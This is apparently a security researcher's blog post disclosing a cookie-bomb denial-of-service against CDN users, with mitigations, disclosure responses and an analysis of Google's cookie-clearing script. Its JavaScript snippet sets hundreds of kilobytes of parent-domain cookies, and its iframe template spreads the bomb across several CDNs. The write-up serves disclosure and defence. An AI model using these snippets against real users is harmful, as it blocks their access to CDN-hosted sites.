DoS attack on CDN users

Cookie isolation between sibling domains got some publicity recently when GitHub moved user-generated pages to github.io. The problem is not new, but many sites still ignore it. One issue that has somehow escaped popular attention is that the cookie isolation policy can be exploited to break sites that depend on content hosted on Content Delivery Networks.

The issue affects most CDN providers; let me use RackCDN for illustration. Malicious JavaScript embedded in an HTML file served from the foo.rackcdn.com subdomain (visited directly or iframed, so its origin is foo.rackcdn.com) can set a large number of large cookies with the domain attribute set to rackcdn.com. Such cookies are then sent with all future requests to all *.rackcdn.com subdomains.
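As a minimal sketch of such a cookie bomb (the cookie names, the padding size and the loop count are mine, chosen to stay under typical per-cookie limits):

// runs in a page served from foo.rackcdn.com, so it is allowed to set
// cookies scoped to the whole parent domain rackcdn.com
var padding = new Array(4000).join("x"); // ~4KB of filler per cookie
for (var i = 0; i < 180; i++) {          // ~700KB in total
  document.cookie = "bomb" + i + "=" + padding +
    ";domain=.rackcdn.com;path=/" +
    ";expires=Fri, 01 Jan 2038 00:00:01 GMT";
}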

Firefox allows the combined size of cookies for a domain to reach 614KB, Chrome 737KB, IE 10KB. After a visit to a malicious site that iframes the cookie-setting HTML from foo.rackcdn.com, each subsequent request to any subdomain of the CDN carries many KB of cookies. This effectively prevents the browser from accessing any content on *.rackcdn.com. HTTP servers are configured to limit the size of HTTP headers that clients can send; common and reasonable limits are 4KB or 8KB (see the example configurations after the list below). If the limit is exceeded, the offending request is rejected. In my tests I haven’t found a single server that would accept ~0.5MB worth of headers; popular responses are:

  • A TCP reset while the client is still sending.
  • An HTTP 4XX error code (400, 413, 431 or 494) followed by a TCP reset while the client is still sending.
  • An HTTP 4XX error code after the request has been fully transferred.
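For reference, this is roughly where such limits live in two popular servers; the values shown are the usual defaults, not a recommendation:

# nginx: requests whose headers exceed these buffers are rejected
large_client_header_buffers 4 8k;

# Apache httpd: maximum size of a single request header line, in bytes
LimitRequestFieldSize 8190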

Even if CDN servers accepted such large requests, the overhead of sending the data would severely degrade performance.

A nasty aspect is that a malicious site does not need to target a single CDN; it can use iframes to include cookie-setting HTML from multiple CDNs and prevent a visitor from accessing a considerable part of the Internet. Note that this is not a DoS on CDN infrastructure, for which 0.5MB requests should be insignificant.
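Such a page needs nothing more than a handful of hidden iframes; the domains and the path below are hypothetical:

<!-- each iframe loads cookie-setting HTML hosted on a different CDN -->
<iframe src="http://attacker-bucket.cdn-a.example/bomb.html" style="display:none"></iframe>
<iframe src="http://attacker-bucket.cdn-b.example/bomb.html" style="display:none"></iframe>
<iframe src="http://attacker-bucket.cdn-c.example/bomb.html" style="display:none"></iframe>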

CDN level protection

To protect Firefox, Chrome and Opera users, CDN providers should make sure that a domain shared by their clients is on the Public Suffix List. If a CDN provider uses a bucket.common-domain.xyz naming scheme (for example foo.rackcdn.com), common-domain.xyz should be a public suffix. For more elaborate schemes, such as bucket.something.common-domain.xyz (for example a248.e.akamai.net), *.common-domain.xyz should be a public suffix.
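On the list itself the two schemes would translate to entries like these (hypothetical, since neither domain was on the list at the time of writing; // starts a comment and a leading *. matches one additional label):

// for the bucket.common-domain.xyz scheme
rackcdn.com

// for the bucket.something.common-domain.xyz scheme
*.akamai.net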

IE does not use the list, but since IE limits the combined size of cookies to only 10KB, CDN servers could be configured to accept such requests. The attack would still add a significant overhead to each request, but at least the requests would be served. Hopefully, with issues like this exposed, IE will switch to the Public Suffix List at some point.
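With nginx, for example, accommodating IE's worst case could be as simple as raising the default header buffers above the 10KB cookie limit (a sketch, not a tested recommendation):

# allow headers large enough for a full 10KB IE cookie jar
large_client_header_buffers 4 16k;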

Web site level protection

The only things a web site that depends on a CDN can do to ensure its CDN-hosted content remains accessible to users are to choose a CDN that supports custom domains, choose a CDN whose shared domain is on the Public Suffix List, or ask the CDN provider to add the shared domain to the list. A custom domain can be problematic if the site wants to retrieve content from the CDN over HTTPS (a wise thing to do): while CDN services are cheap today, CDN services with custom domains and HTTPS are quite expensive.

Browser level protection

To efficiently prevent the attack, users would need to configure their browsers to reject all cookies by default and allow only white-listed sites to set them. There are extensions that make this quite convenient. Similarly, rejecting all JavaScript by default and white-listing only trusted sites fully prevents the attack.

Disabling third-party cookies mitigates the problem. While a malicious site can still set a cookie bomb, it now needs to be visited directly (not iframed), and it can target only a single CDN at a time. The new Firefox cookie policy, to be introduced in release 22, should have the same effect.

Affected CDNs

All CDN providers that use a shared domain that is not on the Public Suffix List are affected. This is a long list; I’ve directly contacted four of them:

Amazon confirmed the problem and added CloudFront and S3 domains to the Public Suffix List.

Rackspace and Akamai did not respond.

Google did not confirm the issue with CloudStorage. Google deploys a JavaScript-based protection mechanism that can work in some limited cases, but in my tests it never effectively protected CloudStorage.

When a Google server receives a request with headers that are too large, it responds with HTTP error code 413 and an HTML page with a script that should drop the offending cookies (white space added by me):

if(!location.hostname.match(/(^|\.)(google|blogger|orkut|youtube)\.com$/)) {
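  // strip the file name, keeping only the directory part of the path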
  var purePath=location.pathname.replace(/\/[^\/]*$/,"");
  var cookieSet=document.cookie.split(";");
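  // outer loop: iterate over every cookie visible to this page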
  for(var cookieNum=0;cookieNum<cookieSet.length;++cookieNum){
    var name=cookieSet[cookieNum].split("=")[0];
    var host=location.hostname;
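    // middle loop: walk the domain from the full host upwards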
    while(1){
      var path=purePath;
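      // inner loop: walk the path from the deepest directory upwards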
      while(1){
        document.cookie = name+"=;path="+path+"/;domain="+host+
          ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
        var lastSlash=path.lastIndexOf("/");
        if(lastSlash==-1)
          break;
        path=path.slice(0, lastSlash)
      }
      var firstDot=host.indexOf(".",1);
      if(firstDot==-1)
        break;
      host=host.slice(firstDot)
    }
  }
  setTimeout("location.reload()",1E3)
};

This code loops through all cookies and overwrites them with expired values. Because the path and the domain are parts of a cookie’s identity but are not exposed by the browser API, the cleaning code needs to cover all possible paths and domains (hence the three loops). This works fine if the code is executed.

The problem is that the HTTP server resets the connection just after returning the response, while the client is still sending the request. The browser then does not interpret the response as an HTTP-level 413 error, but as a TCP-level connection reset. The servers would need to let clients send the complete request for the response to be interpreted.

Another problem is that the code is executed in the context of the *.commondatastorage.googleapis.com domain only when the browser requests an HTML file from this domain directly or via an iframe. If a browser is requesting images, scripts or CSS, which is most often the case with CDNs, the cookie-clearing JavaScript has no chance of being executed.

Other affected sites

CDNs are the most interesting targets for a DoS attack like this, but many sites can also be targeted directly. I’ve notified GitHub and Dropbox; both were already working on moving user-generated pages to separate domains (the move is now completed). While this protects github.com and dropbox.com, user content can still be subject to the DoS. Similarly, it is easy to cut off access to Google Drive-hosted static pages or to Tumblr.